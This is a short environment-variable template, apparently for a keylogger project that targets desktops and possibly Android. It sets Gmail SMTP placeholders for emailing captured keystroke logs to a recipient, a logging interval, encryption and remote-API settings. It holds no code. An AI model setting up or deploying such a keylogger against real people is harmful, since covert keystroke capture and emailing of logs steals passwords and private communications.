# Email Configuration for Log Transmission
SMTP_SERVER=smtp.gmail.com
SMTP_PORT=587
SENDER_EMAIL=your_email@gmail.com
SENDER_PASSWORD=your_app_password
RECIPIENT_EMAIL=target_email@example.com

# Keylogger Configuration
LOG_INTERVAL=10
ENCRYPTION_ENABLED=true
EMAIL_REPORTS_ENABLED=false

# Optional Firebase Configuration (for Android)
FIREBASE_API_KEY=
FIREBASE_PROJECT_ID=
FIREBASE_MESSAGING_SENDER_ID=
FIREBASE_APP_ID=

# Optional Remote API Configuration
API_SECRET_KEY=generate_a_strong_secret_key_here
API_HOST=0.0.0.0
API_PORT=8000 